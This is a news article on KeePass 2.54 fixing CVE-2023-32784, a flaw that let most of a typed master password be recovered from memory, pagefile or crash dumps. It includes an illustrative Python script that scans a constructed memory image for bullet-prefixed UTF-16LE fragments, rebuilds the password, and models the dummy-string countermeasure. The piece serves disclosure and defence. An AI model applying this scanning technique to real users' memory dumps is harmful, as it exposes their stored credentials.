KeePass has released version 2.54, fixing the CVE-2023-32784 vulnerability that allowed the cleartext master password to be extracted from the application's memory.
When creating a new KeePass password manager database, users must create a master password, which is used to encrypt the database. When opening the database in the future, users are required to enter this master key to decrypt it and access the credentials stored within it.
However, in May 2023, security researcher 'vdohney' disclosed a vulnerability and a proof-of-concept exploit that allowed an attacker to partially extract the cleartext KeePass master password from a memory dump of the application.
“The problem is with SecureTextBoxEx. Because of the way it processes input, when the user types the password, there will be leftover strings,” explained vdohney in a KeePass bug report.
“For example, when ‘Password’ is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d.”
The proof-of-concept dumper recovers almost all of the master password characters, apart from the first one or two, even if the KeePass workspace is locked or the program was closed recently, because the leftover strings persist in process memory, crash dumps, and the pagefile or hibernation file.
Information-stealing malware or threat actors could use this technique to dump the program’s memory and send it and the KeePass database back to a remote server for offline retrieval of the cleartext password from the memory dump. Once the password is retrieved, they can open the KeePass password database and access all the saved account credentials.
KeePass’s creator and main developer, Dominik Reichl, acknowledged the flaw and promised to release a fix soon, having already implemented an effective solution being tested in beta builds.
KeePass 2.54 fixes vulnerability
Over the weekend, Reichl released KeePass 2.54 sooner than expected, and all users of the 2.x branch are strongly recommended to upgrade to the new version.
Users of KeePass 1.x, Strongbox, or KeePassXC are not impacted by CVE-2023-32784 and, thus, do not need to migrate to a newer release.
To fix the vulnerability, KeePass now uses Windows API functions to set and retrieve the text of the password boxes in the master key dialog, preventing the creation of managed .NET strings that could be dumped from memory.
Reichl also introduced “dummy strings” with random characters into the memory of the KeePass process to make it harder to retrieve fragments of the password from memory and combine them into a valid master password.
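The following Python script is an added example, not code from vdohney's proof of concept or from KeePass, that illustrates both the leftover-string pattern described above and why planting dummy strings frustrates it. It builds a constructed memory image (UTF-16LE strings, as .NET stores them, separated by filler bytes), scans it for bullet-prefixed fragments, and uses the bullet count as the character's position. The dummy-string part is a simplified model of the 2.54 countermeasure and is an assumption about its effect, not KeePass's actual implementation; the `demo`, `build_dump` and `dummy_fragments` helpers are hypothetical.

```python
import random
import re
import string

BULLET = "\u2022"  # U+2022, the masking character the password box displays


def leftover_fragments(password: str) -> list[str]:
    """Model of the strings vdohney reported for SecureTextBoxEx: typing the
    i-th character leaves a string of i bullets followed by that character.
    Typing the first character leaves nothing, so position 0 is never present."""
    return [BULLET * i + password[i] for i in range(1, len(password))]


def dummy_fragments(password: str, rng: random.Random, per_char: int = 3) -> list[str]:
    """Simplified model (an assumption, not KeePass's actual code) of the 2.54
    countermeasure: beside each real fragment, several look-alike fragments with
    a random character are planted, so every position has competing candidates."""
    out = []
    for i in range(1, len(password)):
        decoys = [c for c in string.ascii_letters if c != password[i]]
        out += [BULLET * i + rng.choice(decoys) for _ in range(per_char)]
    return out


def build_dump(fragments: list[str], rng: random.Random, gap: int = 64) -> bytes:
    """Constructed stand-in for a process memory image: fragments are stored as
    .NET-style UTF-16LE strings in shuffled order, separated by filler bytes.
    The filler is ASCII uppercase so it cannot accidentally spell a bullet."""
    def filler() -> bytes:
        return bytes(rng.randint(0x41, 0x5A) for _ in range(gap))

    frags = list(fragments)
    rng.shuffle(frags)
    dump = filler()
    for f in frags:
        dump += f.encode("utf-16-le") + filler()
    return dump


# One or more UTF-16LE bullets (b"\x22\x20"), then the two bytes of the character
# that follows. The lookahead stops a truncated run at the end of the image from
# being misread as a bullet character. A password character that is itself U+2022
# would be swallowed by the run (edge case the scan does not handle).
FRAGMENT_RE = re.compile(rb"((?:\x22\x20)+)(?!\x22\x20)([\x00-\xff]{2})")


def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """Scan a raw memory image for bullet-prefixed fragments. The bullet count is
    the character's index in the password, so fragment order is irrelevant."""
    seen: dict[int, set[str]] = {}
    for m in FRAGMENT_RE.finditer(dump):
        index = len(m.group(1)) // 2
        ch = m.group(2).decode("utf-16-le", errors="replace")
        seen.setdefault(index, set()).add(ch)
    return seen


def reconstruct(positions: dict[int, set[str]]) -> str:
    """Join unambiguous positions into a password guess; '?' marks a position
    that is missing (always position 0) or has more than one candidate."""
    if not positions:
        return ""
    out = []
    for i in range(max(positions) + 1):
        chars = positions.get(i, set())
        out.append(next(iter(chars)) if len(chars) == 1 else "?")
    return "".join(out)


def demo(password: str = "Password", seed: int = 1) -> tuple[str, str]:
    """Recover from an image with leftover strings only, then from one that also
    carries dummy strings. Returns (guess_without_dummies, guess_with_dummies)."""
    rng = random.Random(seed)
    plain = build_dump(leftover_fragments(password), rng)
    hardened = build_dump(leftover_fragments(password) + dummy_fragments(password, rng), rng)
    return (reconstruct(recover_candidates(plain)),
            reconstruct(recover_candidates(hardened)))


if __name__ == "__main__":
    before, after = demo()
    print("leftover strings only:", before)  # ?assword
    print("with dummy strings:   ", after)   # ????????
```

Against the plain image the scan recovers everything but the first character, matching the "•a, ••s, ..." pattern in the bug report; once several fragments compete for each position, the bullet count no longer identifies a single character and the guess collapses to unknowns. Note that the scan only finds fragments that were created by typing; pasted passwords never produce them.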
KeePass 2.54 also introduces other security enhancements, such as moving 'Triggers,' 'Global URL overrides,' and 'Password generator profiles' into the enforced configuration file, which provides additional protection against attacks that modify the KeePass configuration file.
If the triggers, overrides, and profiles aren’t stored in the enforced config because they were created using a previous version, they will be disabled automatically in 2.54, and users will have to manually activate them from the ‘Tools’ settings menu.
Users who cannot upgrade to KeePass 2.54 are recommended to reset their master password, delete crash dumps, hibernation files, and swap files that might contain fragments of their master password, or perform a fresh OS install.
Keep in mind that the issue impacts only passwords typed in the program’s input forms, so if the credentials are copied and pasted into the boxes, no data-leaking strings are created in memory.